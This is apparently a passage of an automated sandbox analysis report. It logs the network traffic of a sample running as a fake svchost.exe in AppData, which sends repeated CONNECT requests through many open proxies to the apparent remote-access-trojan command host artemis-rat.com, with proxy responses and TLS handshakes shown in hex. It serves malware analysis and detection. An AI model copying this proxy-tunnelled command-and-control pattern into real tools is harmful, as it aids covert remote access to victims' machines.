                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3351192.168.2.560721211.253.24.57333443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.679708004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.374197960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3352192.168.2.56070265.109.152.88888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.679883003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.442749977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3353192.168.2.56075545.196.151.59543243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.680023909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.333405972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.550231934 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3354192.168.2.56065145.231.133.518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.681237936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.107487917 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:36.110852957 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 aa 31 a4 fc 92 9a 7e fc 18 cb 8c 27 b0 ef b7 b8 48 b2 f7 ce bb 74 ea 2e bb 17 ee 1b c2 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheR1~'Ht.*,+0/$#('=<5/artemis-rat.com#.i,7wpn(E6uJ+l0A;lh_TujssX
                                                                                    Mar 9, 2024 13:14:36.675211906 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 ac ce be 54 3a e0 37 a3 e3 6c ee 0e 32 67 a5 50 90 6d d9 e1 64 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eRT:7l2gPmdDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:36.675276041 CET536INData Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00
                                                                                    Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
                                                                                    Mar 9, 2024 13:14:36.675295115 CET376INData Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c
                                                                                    Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
                                                                                    Mar 9, 2024 13:14:36.876533985 CET536INData Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31
                                                                                    Data Ascii: |0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
                                                                                    Mar 9, 2024 13:14:36.876607895 CET536INData Raw: 01 a3 82 01 76 30 82 01 72 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d
                                                                                    Data Ascii: v0r0U0U%0++0U00Un+_+0U#0+&q+H'/Rf,q>0h+\0Z0&+0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.
                                                                                    Mar 9, 2024 13:14:36.876614094 CET536INData Raw: b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd 71 d8 61 65 39 84 ac 32 3e f7 7a 36 f1 56 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5
                                                                                    Data Ascii: G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[pe
                                                                                    Mar 9, 2024 13:14:36.876653910 CET536INData Raw: 32 38 30 30 30 30 34 32 5a 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 31
                                                                                    Data Ascii: 28000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10"0*H0w;>@<}2qj.K+^R#'c~^hZGM3NlKd)%#=.`
                                                                                    Mar 9, 2024 13:14:36.876749992 CET536INData Raw: 3a 66 ec 07 8a 26 df 13 d7 57 65 78 27 de 5e 49 14 00 a2 00 7f 9a a8 21 b6 a9 b1 95 b0 a5 b9 0d 16 11 da c7 6c 48 3c 40 e0 7e 0d 5a cd 56 3c d1 97 05 b9 cb 4b ed 39 4b 9c c4 3f d2 55 13 6e 24 b0 d6 71 fa f4 c1 ba cc ed 1b f5 fe 81 41 d8 00 98 3d
                                                                                    Data Ascii: :f&Wex'^I!lH<@~ZV<K9K?Un$qA=:z78040U0U00U+&q+H'/Rf,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.
                                                                                    Mar 9, 2024 13:14:36.876776934 CET466INData Raw: a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7 d3 26 bf 70 e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3
                                                                                    Data Ascii: oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( uDQPtQZ|ep1y}Lb3$phP:Gu


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3355192.168.2.560753209.126.104.384075043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.681276083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3356192.168.2.5607175.252.23.220108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.682874918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3357192.168.2.556165161.97.173.425394843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.689062119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3358192.168.2.560732185.101.16.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.695264101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3359192.168.2.560867172.67.150.1738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.697521925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.851814985 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3360192.168.2.560860162.159.242.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.697710991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.858741999 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3361192.168.2.560739103.118.46.177808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.701853991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3362192.168.2.5606365.44.42.1155838643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.702056885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3363192.168.2.560673103.242.119.888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.704991102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.111488104 CET629INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Server: Apache
                                                                                    Proxy-Authenticate: Basic realm="Authorization"
                                                                                    Content-Length: 415
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3364192.168.2.560850148.72.23.56326043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.705073118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.373935938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.117336988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378504992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3365192.168.2.56076651.158.108.1341637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.708529949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.374258995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366385937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3366192.168.2.560773161.97.74.1763000043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.766779900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3367192.168.2.560751185.38.111.1808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.767949104 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:36.089368105 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:36.410840988 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3368192.168.2.56077891.189.177.188312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.768771887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.090747118 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 